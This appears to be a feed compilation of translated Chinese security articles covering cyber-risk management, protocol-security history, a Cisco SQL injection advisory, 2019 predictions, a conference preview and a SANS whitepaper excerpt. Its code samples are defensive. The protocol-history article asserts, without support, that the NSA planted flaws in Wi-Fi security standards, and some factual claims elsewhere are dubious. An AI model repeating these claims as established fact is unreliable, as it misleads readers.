
Three Keywords for Cyber Risk Management: Collaboration, Data, Assessment


The goal of enterprise risk management (ERM) is to handle risk holistically in the most economically sensible way. In brief, the process is: assess the various risks the enterprise may face, classify and quantify them, understand the organization's risk tolerance, and adopt timely, effective measures to prevent and control them.

In the past, when enterprises looked at risk management, financial, regulatory, and operational risks were the focus: exchange-rate and interest-rate movements, whether a production license could be obtained, or hidden hazards in logistics and warehousing. Today, as enterprises digitize more deeply, cyber risk is drawing increasing attention from management and has moved into the first tier of risk-management priorities. That poses a new challenge for security managers: quantifying the business impact of a cybersecurity incident is very hard, and quantifying the likelihood of such an incident is harder still.

Collaboration between technology and the business

Within an ERM framework, the word "risk" means different things to different roles. Cybersecurity leads tend to focus on technical questions, for example what damage an attacker could do by exploiting an unpatched vulnerability. Viewed from the business side, the same issue reads differently: the vulnerability could lead to a database breach and data theft, causing a specific amount of lost business plus fines and remediation costs. Decision makers, in turn, need to judge whether a given mitigation is worthwhile; if it does not reduce risk significantly, or the systems involved are not critical, the time and money are better spent elsewhere.
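One common way to put numbers on this tradeoff is the classic quantitative risk formula: single loss expectancy (SLE) = asset value × exposure factor, and annualized loss expectancy (ALE) = SLE × annual rate of occurrence. A minimal sketch with hypothetical figures (the dollar amounts and rates below are illustrative, not from this article):

```python
def annual_loss_expectancy(asset_value, exposure_factor, annual_rate):
    # SLE = asset value x exposure factor; ALE = SLE x annual rate of occurrence.
    single_loss = asset_value * exposure_factor
    return single_loss * annual_rate

# Hypothetical: a $2M database, 40% of value lost per breach, 0.25 breaches/year.
ale = annual_loss_expectancy(2_000_000, 0.4, 0.25)
print(ale)  # 200000.0
```

A mitigation that costs more per year than the ALE it removes is hard to justify, which is exactly the decision the paragraph above describes.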

As Gartner analyst Brian Reed has put it, the lack of communication between technical and business staff is a perennial problem: business people don't understand the technical issues, and technical people don't know how to demonstrate business value.

FedEx is used to planning for outage risk around Christmas, the shipping industry's peak season. In 2017, however, a ransomware attack struck in June, causing roughly $300 million in losses. This is why deep collaboration between security experts and business units matters so much: a little more time spent communicating makes risk management considerably more effective.

Invest more effort in protecting enterprise data

In the past two years, no cyber-risk topic has been hotter than data breaches. They seem to happen daily: Facebook, Under Armour, AcFun, Huazhu... User data is a valuable corporate asset, and handling it exposes the enterprise to enormous risk. Imagine waking up to find your company in the headlines over a data breach.

Laws and regulations are also maturing: China's "Information Security Technology - Personal Information Security Specification" took effect on May 1, 2018, and the EU's General Data Protection Regulation (GDPR) came into force on May 25, 2018. Enterprises that fail to protect data properly face severe regulatory penalties.

As for concrete measures: beyond data governance tailored to the enterprise's own situation and data-security technologies such as access control, data loss prevention, and business-data risk management, security-awareness training for employees should not be neglected.

Adopt more assessment methods

Because risk changes constantly, enterprises need a scientific way to quantify the likelihood of cyber risk materializing. This is also the biggest problem facing the cyber-insurance industry: despite the hype, no major insurer worldwide has rolled out cyber-insurance policies broadly. Growing demand is pushing the industry forward, and over the past two years practitioners have kept refining the risk-assessment process, for example by introducing "security rating services" that measure an enterprise's risk from the outside. Combined with traditional methods such as questionnaires and on-site assessments, this makes the results more reliable.

Enterprises can take the same approach, using ratings or audits for risk assessment. Security rating is still an emerging industry: about ten companies worldwide specialize in it, the earliest being PREVALENT, registered in 2004. Apart from UpGuard and 安全值 (Security Value), all are registered in the US. (UpGuard began as an Australian startup and later moved its headquarters to San Francisco; 安全值 is a Chinese team headquartered in Beijing.)


The Legend of Network Protocols (Part 5): The Shadow of Great Powers Lingers


Vint Cerf's involvement with TCP/IP began in 1973. He later recalled that it took him 20 years to realize the pioneering work he had joined was changing the world, and what triggered the realization was Netscape's World Wide Web offerings: "It meant ordinary people could use the network freely. I saw that change had really arrived."

But much like the famous "two clouds" in the history of physics, just as Vint Cerf and his peers were celebrating the internet's greatness, dark clouds were already gathering over it, sounding a stark security warning.

(Image source: 包图网)

The first lesson in network security

In 1988, Robert Morris was a student at Cornell University. Around 7 p.m. on November 2, driven by curiosity, he released a "worm" program of his own writing onto the network. The program was only 99 lines of code, and Morris's intent was merely to measure the size of the internet at the time. What nobody expected was that this small act would nearly destroy the young internet.

The accident stemmed from a programming error in the worm's propagation mechanism, which turned what might have been a harmless intellectual exercise into a malicious denial-of-service attack. The runaway worm copied itself at high speed, consuming disk and memory on networked computers until they crashed under the load. By hogging system resources it effectively paralyzed the network and destroyed large amounts of data; more than 10% of all computers then connected were affected, with losses approaching $100 million.

The Morris worm shook the young internet. It was the first computer virus to spread via the internet, giving early operators and users their first look at the power of a network attack, and in some measure it directly spawned the computer and network security industry. It was clearly a man-made disaster, yet from a technical standpoint it was also an inevitable one. Only then did the internet's designers realize they had made a serious mistake years earlier.

The pioneers overlooked security

One issue has long pained Vint Cerf and his colleagues: security was left out from the very start. "If I could reinvent the internet now, I would build in more protections from the beginning, blocking as much of the bad stuff as possible from the internet's back end rather than at the endpoints. But at the time, many of those protective methods had not yet been invented," Cerf has said.

Cerf's regret is palpable; in fact, in the TCP/IP suite he produced, the IP protocol itself provides no security features at all. But he can hardly be blamed; he could not escape the limits of his era. Back then most network connections ran between universities and elite research institutes; the users and the operating environment were so benign that it was only natural to overlook security.

From an engineering standpoint, moreover, this was inevitable. By functional logic, network protocols divide into communication protocols, which handle connectivity and transfer efficiency, and security protocols, which govern secure connection and transmission. At the dawn of networking, the pioneering scientists naturally concentrated on communication protocols, the prerequisite for networking at all: their first problems were how to interconnect different computers and different networks and how to deliver data correctly, getting it to the right place through the right door.

The bigger eruption of security problems came later, in the internet's era of commercial operation, long after the founders' act of creation.

Cerf's view is not outdated, though; it represents today's hopes for future network security. Rather than the firewalls, antivirus, and other protections layered on top of networks and endpoints, the aspiration is a network that protects itself: building intrinsic security into the protocol layer, so that the "back end" of the internet can "block as much of the bad stuff as possible."

That is indeed what people have done: by improving or redesigning security protocols, they have given the protocol family stronger security across the various layers of the OSI seven-layer reference model. The unavoidable problem, of course, is that the network train is already on the highway; every repair has to be made at full speed, which makes the job harder.

Path lock-in by the first movers

To secure data in transit over TCP, Netscape Communications Corporation proposed the Secure Socket Layer (SSL) protocol in 1994. Because SSL 2 was released without consultation with security experts outside Netscape, it was insufficiently thought through and had serious weaknesses. In 1995 Netscape released SSL 3, fixing many of SSL 2's flaws, and it drew wide industry attention. The IETF then formed the Transport Layer Security (TLS) working group, designed TLS on the basis of SSL 3, and released TLS 1.0, 1.1, and 1.2 in 1999, 2006, and 2008 respectively, patching a large number of design and implementation flaws.

The lesson: security is relative. Patching protocol flaws does not end just because you have spent a decade on it; in the years ahead, successive version numbers will keep marking newly discovered holes. Why? Chiefly because we cannot foresee the future, just as Vint Cerf could not foresee IP's security problems. That is the limitation of history.
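On the client side, the practical upshot of this version history is to refuse the broken protocol generations outright. A short sketch using Python's standard ssl module (the module and enum names are real; pinning the floor at TLS 1.2 is our policy choice, not something the article prescribes):

```python
import ssl

def make_client_context():
    # Start from Python's hardened defaults (certificate verification on,
    # SSLv2/SSLv3 already disabled), then refuse TLS 1.0 and 1.1 as well.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

ctx = make_client_context()
print(ctx.minimum_version == ssl.TLSVersion.TLSv1_2)  # True
```

Such a context can then be passed to `http.client` or `urllib.request` so that connections to servers still speaking only the legacy versions simply fail.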

From the early 1990s, standards bodies launched security research projects for the data-link and IP layers and produced general-purpose security protocols intended to remedy IP's deficiencies, which were then deployed across all kinds of networks. Yet many of these painstakingly developed security protocols have become security black holes in today's usage scenarios.

A brief history of security thinking is in order here. Initially, security protocols were designed around a master/slave model whose premise was that, from the user's perspective, the network is fully trusted: the person on the phone unconditionally trusts the base station, and once the station validates the handset the two can connect, with the handset never validating the station. This logic is called one-way authentication, and Wi-Fi's WEP mechanism is one of its products.

That design matched the realities of the pioneering era, when a base station was equipment with formidable technical and cost barriers, beyond an individual's reach, and its owner (the telecom carrier) could be treated as inherently honest. Today things are very different: base stations are ever cheaper, small enough to carry around in a backpack. Hence the frequent outbreaks of rogue base stations, man-in-the-middle attacks, and similar problems.

Under security pressure, Wi-Fi adopted 802.1X in a major security upgrade. Its mechanism moved from one-way toward quasi-mutual authentication, but the move to mutual authentication was incomplete. In October 2017, WPA2, the strongest security mechanism in the Wi-Fi protocol suite, was declared broken. The Wi-Fi Alliance hurried out WPA3 at CES in January 2018 and declared the protocol final that June. Technically, however, WPA3 does not change Wi-Fi's authentication architecture; continuing on the old, insecure architecture, it still cannot solve problems such as man-in-the-middle attacks.
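The difference between one-way and mutual authentication is easy to see in a toy challenge-response exchange. The sketch below is our illustration, not any Wi-Fi handshake: it assumes a single pre-shared key (real protocols derive per-session keys), and shows that mutuality simply means each side proves key possession over the other's fresh nonce:

```python
import hashlib
import hmac
import os

SHARED_KEY = b"pre-shared-key"  # hypothetical PSK known to station and client

def prove(nonce, key=SHARED_KEY):
    # Proof of key possession: MAC the peer's fresh random challenge.
    return hmac.new(key, nonce, hashlib.sha256).digest()

# One-way (WEP-style): only the client answers the station's challenge,
# so a rogue base station is never asked to prove anything.
station_nonce = os.urandom(16)
client_proof = prove(station_nonce)

# Mutual: the client also challenges the station; an impostor without
# the key cannot produce station_proof.
client_nonce = os.urandom(16)
station_proof = prove(client_nonce)

assert hmac.compare_digest(client_proof, prove(station_nonce))
assert hmac.compare_digest(station_proof, prove(client_nonce))
print("both sides authenticated")
```

The asymmetry the article criticizes is visible here: dropping the second challenge costs nothing to the protocol's "happy path," which is precisely why it was omitted in the trusted-network era.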

The Wi-Fi camp's adherence to its technical path is not sentiment but a calculation about sustaining market dominance; with a huge, already-successful market at stake, Wi-Fi can only stay the course. Given its own evident flaws, its sensitivity and wariness toward challengers have been extreme, and Wi-Fi has indeed shown its rivals what the jungle looks like. At such moments the hand of government reappears, only this time on the wrong side.

Latecomers cannot break the board

Europe's HiperLAN was one of the early wireless LAN technologies, a contemporaneous competitor to the American scheme (the IEEE 802.11 family, popularly known as Wi-Fi). It was successfully lured into standardization at the US-controlled IEEE, where, unsurprisingly, the scheme led by American industry became the official standard; HiperLAN was played, and left to wither on the vine. The other wireless-LAN contender, China's WAPI, likewise ran into trouble under American interference, with its industrialization and commercialization badly disrupted, though its story was even more turbulent (the episode is well known and needs no retelling here). Everything was under control: a 2003 internal IEEE document put it as "wars are fought one at a time; WAPI is next (HiperLAN was the last one)."

The wireless-LAN contest is only the tip of the protocol-war iceberg; the covert battles beneath it are more dramatic. As noted above, ever more network security protocols are being designed and deployed, yet embarrassingly, many are found flawed the moment they launch. And there is another kind: the flaw nobody finds until a certain person appears, say, the American Edward Snowden.

In June 2013, former CIA employee Edward Snowden disclosed the US "PRISM" program. One key revelation: the United States effects network surveillance by controlling the making of international standards, and the National Security Agency (NSA) had covertly maneuvered its own security standards into international standards. Later disclosures showed the US government spent decades developing and refining a body of security-protocol technologies and standards it could control, including 802.1X, IEEE 802.11i, and other security protocol standards, to protect its national network-security interests. Further details include exploiting vulnerabilities deliberately planted in those standards' protocols for mass global surveillance and network attack. Available records show the NSA began involving itself in the "development" of network security protocols as early as 1986.

An insecure "security protocol" is more destructive: it is highly covert, and far harder to discover and remove. The industry has a vivid metaphor for it: a poisoned seed is scarier than poisoned bread! There is now consensus in the field that security problems in protocol technology are becoming the disaster zone of network security.

The exposure of PRISM directly collapsed the global foundation of network trust. In a 2015 ISO/IEC standards discussion, a Norwegian expert stated plainly: "Our very clear consensus is that the SIMON and SPECK algorithms should not be included in ISO 29192-2, based on the fact that these algorithms were proposed by the NSA, and we do not trust the NSA to propose security standards in good faith." No technical detail is needed to smell the distrust in the air.

The Americans go to such lengths because protocols matter so much. A protocol is a rule, and network protocols are the network's rules. They appear as vast bodies of standards and specification documents; they are embedded in chips, operating systems, and every kind of networked device and product; they run through entire upstream and downstream industry chains and reach every corner of the network. No protocols, no network. Security protocols are a basic component of that whole: not only the cornerstone of network security, but the pivotal ground of protocol evolution today.

The influence of protocols on the direction of whole industries can hardly be overstated. It explains the relentless American pursuit of WAPI: beyond the heavy-handed intervention of 2003-2004, WAPI appears in US government reports almost every year. The latest mention came in a White House report of June 2018, which classed WAPI among "strategic industries"; fifteen years on, they finally said what they meant.

Objectively, the United States has contributed greatly to the birth and growth of network protocol technology, and that remains true today. But once its capability became wildly asymmetric to other nations', driven by unregulated power and influence, the network became an American tool for spying on and threatening other countries. At such a sight, one may think back to the young internet of the 1970s and 80s: a company of great scientists and corporate champions, like so many youths in white, everything rising in vigor and high spirits...

From the butterfly wing-beat of ARPANET, humanity has traveled nearly half a century. Starting from four interconnected mainframes on the US west coast, people gradually linked up the local networks scattered around the world and finally turned it into a global village. The network has created incalculable long-term value for humanity; in the foreseeable future it will connect everything, and its legend will run on. The intertwined legend of network protocols will play out alongside it, continuing to gather human wisdom, accommodating history, integrating the present, and embracing the future, endlessly created, evolved, and renewed, joining the individuals, companies, industries, and nations involved in a great epic of human technological innovation.


(End of series)

Cisco Fixes Critical SQL Injection Vulnerability in Prime License Manager

$
0
0

Cisco just patched a critical SQL injection vulnerability residing in the web framework code of the Cisco Prime License Manager (PLM), a product designed to help administrators manage user licenses on an enterprise-wide scale.

Potential remote attackers could execute arbitrary SQL queries on vulnerable machines after successfully exploiting the CVE-2018-15441 security issue.

According to Cisco's advisory detailing this SQL injection security bug in the Cisco Prime License Manager solution, the issue resides in the "lack of proper validation of user-supplied input in SQL queries."

Cisco also says that "An attacker could exploit this vulnerability by sending crafted HTTP POST requests that contain malicious SQL statements to an affected application."

Furthermore, adversaries that manage to use an exploit to compromise a vulnerable target can also delete or modify any data within Prime License Manager's database, as well as obtain shell access with the system privileges of the postgres user account.
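Unvalidated user input concatenated into SQL text is the textbook case for parameterized statements. A sketch of the standard fix using Python's sqlite3 as a stand-in (this is not Cisco's code; the table and column names are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE licenses (user TEXT, seats INTEGER)")
conn.execute("INSERT INTO licenses VALUES ('alice', 5)")

def seat_count(conn, user):
    # The ? placeholder binds `user` as data, so SQL metacharacters in
    # attacker-controlled input never reach the query parser.
    row = conn.execute(
        "SELECT seats FROM licenses WHERE user = ?", (user,)
    ).fetchone()
    return row[0] if row else None

print(seat_count(conn, "alice"))         # 5
print(seat_count(conn, "x' OR '1'='1"))  # None: the injection attempt is inert
```

Had the same lookup been built with string formatting, the second call's payload would have widened the WHERE clause to every row, the class of flaw CVE-2018-15441 describes.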

There are no known workarounds to mitigate this vulnerability at the moment, but Cisco has already released software updates which address the vulnerability.

This vulnerability impacts only PLM 11.0.1 or later installations

The CVE-2018-15441 security issue impacts Cisco Prime License Manager 11.0.1 and later, with both coresident and standalone deployments being affected.

In coresident configurations, the Cisco Prime License Manager solution is installed as part of the Cisco Unified Communications Manager and Cisco Unity Connection suites.

Moreover, because Cisco PLM is not included within versions 12.0 or later of Cisco Unity Connection and Cisco Unified Communications Manager, these versions of the two suites are not impacted by this SQL injection vulnerability.

"The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory," the advisory also says.

9 Cybersecurity Predictions for 2019


Prediction is hard, and prediction in cybersecurity is harder. The threat surface is vast, offensive and defensive technologies evolve constantly, and nation-state attacks keep growing in both scale and sophistication.

The fog of cyber war makes any trend hard to see or assess. Last year, for instance, CSO's predictions for 2018 failed to anticipate the rapid rise of cryptocurrency mining. In hindsight, this relatively easy, low-risk way for cybercriminals to monetize should have been obvious.

Still, some of CSO's predictions last year hit the mark: more automation in threat-detection processes, a sharp rise in attacks involving IoT devices, and an erosion of trust driven by rising cybercrime.

This year, CSO's forecast of major events and trends for the next 12 months is as follows:

1. Ransomware declines, but remains destructive

Ransomware will gradually recede as criminals shift to other ways of generating revenue, but it will remain a problem, evolving into more targeted attacks. Kaspersky data show that the number of users who encountered ransomware in 2017-2018 fell nearly 30% versus 2016-2017.

Less random, though, means more targeted, and recent ransomware attacks have mostly had major impact. Symantec found that the gang behind the SamSam ransomware now focuses on a relatively small number of US organizations, mostly municipal and healthcare.

Ransomware attacks are declining because criminals have found cryptojacking and other more effective ways to make money. The quantity and quality of off-the-shelf mining tools mean criminals need little skill, a point borne out by Kaspersky's numbers: victims of cryptomining attacks rose 44.5% over the past year. Hidden coin miners will keep surging in 2019 as malware authors use them against your business. As long as attackers can earn extra income from miner infections, cryptojacking will remain a threat.

2. Privacy regulation and public attitudes will drive data-protection strategy

Last year, CSO predicted the EU would soon fine a few GDPR violators to make an example of them. That did not come true. Even so, in 2019 the threat of penalties for compromised personal information will continue to have a huge influence on security operations.

Those penalties are likely coming. In the first half of 2019, GDPR enforcement will begin to tighten. Companies suspected of monetizing surveillance of user privacy, such as Google and Facebook, may be in for some rough years. Hundreds of complaints have already been filed, some targeting exactly those two companies.

In 2019 we will see the EU begin responding to those complaints, further clarifying the risks under GDPR and other privacy regulations. Even a failure to respond would send a signal: that the regulation need not be taken too seriously.

Growing attention to how companies protect personal information will push more people to hold those companies accountable. Consumers' reaction to the endless parade of security incidents and other unethical disclosures (Facebook, for example) will lead them to demand more default privacy and controls over their information.

GDPR-like privacy laws are likely in 2019. The California Consumer Privacy Act has been passed and takes effect in 2020. On November 1, US Senator Ron Wyden introduced the Consumer Data Protection Act (CDPA), whose penalties for privacy violations are severe enough to include prison time.

Given the current state of federal effectiveness, that bill is unlikely to attract much attention. Meanwhile, most US companies handling consumer data will use GDPR and CCPA as their reference points. California and New York will keep pushing the conversation on consumer data privacy while the federal government deliberately stalls.

Companies will start considering privacy-first approaches to data handling, especially as these laws extend to more jurisdictions and to specific verticals such as banking, healthcare, and payments. How companies collect, use, and share data will need major adjustment.

3. More nation-state attacks on and surveillance of individuals

State-sponsored cyberattacks on journalists, dissidents, and politicians will keep increasing, and like-minded governments will turn a blind eye to such attacks on their own soil.

The worst possible outcome of surveilling one's own citizens was on full display in the torture and killing of dissident Saudi journalist Khashoggi. Israel's Haaretz reported that the Saudi government used Israeli cyber weapons to surveil Khashoggi while he was in Canada.

The Israeli government appears to be the leading exporter of the technology other governments use to surveil their own citizens. Another Haaretz report said multiple countries use Israeli software to monitor dissidents and gay people.

4. Microsoft will add Advanced Threat Protection (ATP) to all its major products

Windows 10 Advanced Threat Protection (ATP) is a service that lets holders of E5 security licenses see what attackers are doing. Telemetry starts when a computer connects to the ATP service.

Microsoft will extend ATP to all versions of Windows to build a security-first brand image. Over the next few years, the service will be a major selling point for choosing Windows products over IBM Red Hat products.

5. Vote fraud in the midterm elections will be confirmed

Confirmation of vote fraud will spur calls for better protection of voter information and push more people toward online voting, but the conflict between those who want voting to be as convenient as possible and those who want to protect the integrity of the voting process will continue.

We need to ensure everyone can register and vote online, but we also need serious measures to ensure we can do so safely and properly.

6. Multi-factor authentication will become standard for all online transactions

Though far from a perfect solution, most websites and online services will abandon password-only access in favor of methods with additional required or optional authentication. For a while, the different forms of multi-factor authentication (MFA) may confuse and frustrate users.

Relying on passwords alone to verify identity leaves us ever more exposed to phishing and other attacks. But with every vendor rushing to implement its own authentication methods, users may grow exasperated at having to manage multiple second factors. Until more standardized processes emerge, that frustration is unlikely to improve.

Such standards, at least on the vendor side, are already under way, as the FIDO2 browser enhancements and Cisco's acquisition of Duo suggest. Expect more innovation here in the coming year, making MFA easier and more convincing to use.
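The most widely deployed second factor, the six-digit authenticator-app code, is simply RFC 6238 TOTP: an HMAC over a time-step counter derived from a shared secret. A self-contained, standard-library sketch, checked against the test vector published in the RFC:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, step=30):
    # RFC 6238: HMAC-SHA1 over the 8-byte big-endian time-step counter,
    # then RFC 4226 dynamic truncation down to `digits` decimal digits.
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if for_time is None else for_time) // step)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: secret "12345678901234567890" at t=59s -> "94287082".
secret = base64.b32encode(b"12345678901234567890").decode()
print(totp(secret, for_time=59, digits=8))  # 94287082
```

The server and the user's device run the same computation independently; only the shared secret (usually provisioned via a QR code) ever crosses the wire, and only once.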

7. Spear phishing becomes more targeted

Attackers know that the more they know about you, the better their chances of phishing you successfully. Some of these tactics are chilling. One trend in spear phishing: hackers break into an email system, lurk and learn, then exploit what they have learned along with the relationships and trust built among people who correspond regularly.

The clearest example of the trend is mortgage wire fraud: home buyers wire their closing costs to a bogus account supplied in an email from hackers posing as a trusted mortgage agent. The attackers compromise a mortgage lender's computers and note all upcoming transactions and their deadlines. Then, just before the date the agent would normally send the wire-reminder email, the phishers use the agent's own computer to send buyers a closing-cost payment reminder containing the fraudulent account. Naive clients wire the money, then face losing the house (unless they can come up with a second set of closing costs to complete the real transaction, spare cash most people simply do not have).

8. Nations will set rules for cyber warfare

Even in conventional war, most nations agree on basic rules: no torturing prisoners, no poison gas, no massacring civilians. These rules set behavioral boundaries that serve the interests of most of the world's nations.

No such rules exist in cyber warfare, and some nations seem to believe they can do whatever they like. North Korea hacked Sony Pictures; Russia hacks critical industrial control systems and tries to influence other countries' elections; China steals intellectual property; the US and Israel used malware to destroy Iranian nuclear facilities. Digital borders are being probed, and some nation-states have begun striking back. A Geneva Convention for digital war may be on the horizon.

Rules or no rules, some nations will keep crossing the line on cyber warfare. Russia, China, and North Korea will remain havens for cyber attackers, who will have ever more resources at their disposal, whether from the governments behind them or from the ill-gotten gains of ransomware and cryptojacking. They will use those resources to develop new attack methods and to make their malware more resilient and adaptable. Absent a major geopolitical shift, and the earliest plausible one is the next US presidential election, this situation will continue to fester.

9. More companies will require CSOs/CISOs to hold a master's degree in cybersecurity

Cybersecurity training will mature, and certifications alone will no longer be enough to advance a security career. The sprawling assortment of certification schemes cannot provide proper education and training. Master's programs in cybersecurity are proliferating everywhere, with even brand-name schools like UC Berkeley and SUNY joining in, and more and more companies will want to hire CSOs/CISOs who gained cross-disciplinary technical skills through a graduate program.

[This article is an original piece by 51CTO columnist Li Shaopeng; for reprint authorization, contact AQNIU (WeChat public account ID: gooann-sectv).]


FIT 2019 Session Preview: From Bug Bounties to Cyberspace, How to Be a Qualified White Hat | X-Tech Party


Since its birth, the network has kept improving people's lives in countless ways. In today's "Internet Plus" era, internet innovation is deeply fused into every sector of the economy and society, and more and more everyday activities happen over the network. The fusion of new-generation information technologies, cloud computing, big data, IoT, AI, and more, with traditional industries has accelerated society's digital transformation, and rising innovation and productivity have created a broader development ecosystem.

Yet security problems have not vanished with technological progress; on the contrary, they have erupted in this era of rapid advances, with vulnerabilities, malware, social engineering, and other such activity proliferating. As digital transformation deepens, traditional sectors are being woven into this great net at unprecedented speed, and the boundary of network security keeps expanding.

"There is no absolutely secure system" is a truism in the security industry. Vulnerabilities, the internet's constant companion since its birth, have grown harder to defend against as technology diversifies, leaving today's networks more fragile before them than ever. And as the online and physical worlds merge, the scope and depth of security problems are of a different order entirely.

So, facing an ever more complex threat landscape and an unending stream of vulnerability threats, an era where opportunity and challenge coexist, how will the leading figures of internet security respond?

Application security offense and defense through the lens of bug bounties

For an internet company, network security is critical, but constrained by various factors, many companies have not invested appropriately in it, so the vulnerability threat has not eased. Bug bounty programs have become a key security strategy for many internet companies, playing a crucial role at home and abroad and performing impressively since launch: they substantially cut operating costs, and offer more efficiency and flexibility than hiring in-house security staff.

In the past two years, more and more organizations and companies have joined bounty programs, turning "bug bounty" into something of a mass movement.



Zhang Tianqi, CTO of Tophant (斗象科技), will draw on his recent first-hand experience hunting vulnerabilities for overseas vendors to share trends in internet application technology and in security offense and defense. As business requirements grow more complex, large numbers of new technology components are being built into applications, new databases, caches, message queues, big-data components, containers, and so on, greatly enlarging the application's own attack surface. Meanwhile, as workloads migrate to the cloud and cloud features grow richer, building an application security program now often means covering web security, mobile security, and PC-side security all at once, making it harder to build.

The session will use many real cases to share the application-security risks that large vendors of all kinds have exposed under this new technology landscape, along with the corresponding mitigations.

Zhang Tianqi is co-founder and CTO of Tophant, an application security expert, a co-founder of CodeSec, China's first internet-security new-media outlet, and technical lead of the leading vulnerability platform 漏洞盒子 (Vulbox) and the holistic risk-monitoring and analysis system 网藤风险感知. He has spoken at QCon, GSMA, ISC, OWASP, and other industry conferences, has repeatedly appeared in the security halls of fame of Google, Microsoft, Yahoo, PayPal, and other vendors, and has judged the 360 HackPwn competition.

Generic vulnerability hunting with cyberspace search engines

Since the internet's birth, cyberspace has expanded explosively, as if from primordial chaos. Over the years it has stretched from point-to-point links in a virtual realm to connected things, bringing information exchange and human-machine interaction into the physical world: the Internet of Things, where everything is connected. A cyberspace search engine collects and organizes the network assets and devices publicly exposed on the internet; with one, we can quickly learn how many computers, servers, and connected devices are around us. If GPS drew the map of the world, cyberspace search engines are the map of the entire internet.

Cyberspace search engines are closely tied to security vulnerabilities and are commonly used to survey the blast radius of n-day bugs in known components. This session introduces some explored methods for using the ZoomEye cyberspace search engine to identify unknown but widely used components and hunt for 0-day vulnerabilities in them.



Heige (superhei), real name Zhou Jingping, is Chief Security Officer of Knownsec and director of its 404 Lab. He has repeatedly led teams that helped fix vulnerabilities of Microsoft's highest severity rating, earning a place on Microsoft's "Top 100 in history" contributor list announced at Black Hat 2015 and on the annual MSRC Top 100 the following year. For his outstanding contributions to web security he has been called a "legend of Chinese hackers," and he has used his influence to bring along a cohort of young researchers to remarkable achievements.

Brother K on the making of a transformed white hat

In most people's minds, "hackers" are simply villains. Few realize the hacker world has both "black" and "white" sides doing the same thing: using exceptional skill to hunt continuously for security flaws in computers, servers, and network systems. The righteous side is what we call "white hats." With the rapid growth of internet technology and the accelerating revolution of the digital era, network security has become a theme for nations and the world, and the ranks of white hats keep growing.

Beneath the hacker exterior beats a righteous heart. In today's world, security hazards lurk everywhere and vulnerabilities of every stripe keep erupting; but where there is attack there is defense, and against the hackers' relentless advance and the many threats of the online world, it is countless white hats who form its first barrier.



A veteran "white hat," Brother K has been called legendary by some, inspiring by others, and quite ordinary by others still. Either way, in this session he will share along three main lines: a white hat's past growth trajectory, present mindset and situation, and future development and plans.

Some gave up on security; some have chased the field's every step; some went from beginner straight to prison; others gave it up yet found another way to pursue their security dream. From stories of underage to grown-up white hats, you will hear many familiar memes here, examined through yesterday, today, and tomorrow, across life, work, study, and more, with deeper points of reflection and solutions unpacked along the way, closing with some reference guidance on the direction of transformation.

Brother K, Kong Taoxun (K0r4dij, "Little K"), is the current CSO of Digapis (丁牛科技) and founder of the noted information-security team Pox Team. A self-taught high-school dropout with more than 10 years in the field, he has for years helped countless white hats, pro bono, into information-security careers and guided them in charting their own growth paths. He has years of experience serving national party, government, and military information-security projects, such as for ministry-level agencies; specializes in penetration testing, web vulnerability hunting, incident response, and related skills; and has taken part in Belt and Road information-security project work. As a security practitioner, he holds that there are no masters and no noobs, only those who practice more and those who practice less!

FIT 2019 Internet Security Innovation Conference

The CodeSec Internet Security Innovation Conference (FIT), hosted by CodeSec.Net, a leading Chinese internet-security new-media platform, is an annual internet-security gathering; the WitAwards internet security awards ceremony is held alongside it.

FIT 2019 takes place December 12-13, 2018 at the Marriott Shanghai Parkview. The main forum focuses on six segments: the Global Summit, the Frontier Security "S.H.I.E.L.D.", the WitAwards Ceremony, the WIT Security Innovators Alliance, the X-TECH Party, and HACK DEMO, with two independent sub-forums, White Hat LIVE and the Enterprise Security Club, bringing together security practitioners, outstanding technical experts, enterprise security builders, white-hat experts, and research institutions from around the world for talks and discussion. The China CISO Summit and an invitational offline Vulnerability Marathon will run concurrently in special venues. The conference is dedicated to sharing the year's security innovations and jointly exploring the new frontiers of security.

>>> [FIT 2019 official site]



[Pro Bono Translation] The Sliding Scale of Cyber Security, a SANS Analyst Whitepaper



The Sliding Scale of Cyber Security categorizes the measures, capabilities, and resource investments an organization makes in defending against threats, examining cyber security in detail. The model serves as a framework for understanding security measures. Its scale has many uses: explaining technical security matters to non-technical audiences, prioritizing and tracking investments in resources and skills, evaluating security posture, and ensuring accurate root-cause analysis of incidents.

Author: Robert M. Lee

Executive Summary

The Sliding Scale of Cyber Security is a model for discussing the areas of cyber security action and investment in detail. It comprises five categories: Architecture, Passive Defense, Active Defense, Intelligence, and Offense. The five form a continuum, making one thing plain at a glance: the activities of each phase are deliberately designed and dynamic. Understanding these interconnected phases lets organizations and individuals better grasp the goals and impact of their resource investments, build maturity models for their security programs, and break attacks down by phase for accurate root-cause analysis, advancing the defender's craft. Once the phases are understood, it becomes clear that the categories on the left of the scale lay the foundations that make measures in the later phases easier to achieve, with greater effect from fewer resources. The goal in using the sliding scale is to invest resources first in its left side, solving those problems for a sound return on investment, before committing significant resources to the other categories.

The model shows that when an organization prepares its defenses well, attackers must pay a far higher price to succeed. It also helps defenders keep their security measures current.

The Sliding Scale of Cyber Security

As Figure 1 shows, the model divides into five categories: Architecture, Passive Defense, Active Defense, Intelligence, and Offense. This paper introduces each, focusing on their differences and their interconnections.



Figure 1: The Sliding Scale of Cyber Security

The categories are neither fixed nor equally important

The Sliding Scale of Cyber Security gives organizations and individuals a framework for discussing their investments of resources and skills in cyber security. Its five categories, Architecture, Passive Defense, Active Defense, Intelligence, and Offense, work together to improve security, but they are not static, and their importance differs.

The model uses a scale to show that some measures within each category are closely related to the adjacent categories. For example, patching a software vulnerability belongs to Architecture, but the act of patching sits on the right side of that category, closer to Passive Defense than building the system does. Even so, Architecture measures should not be counted as active defense, intelligence, or offense activities. Take intelligence likewise: intelligence activities conducted inside an attacker's network sit closer to offensive action, and can turn into it faster than collecting and analyzing open-source information can. Similarly, collecting and analyzing incident-response data to generate threat intelligence sits closer to Active Defense, because in that category analysts consume threat intelligence for defensive ends.

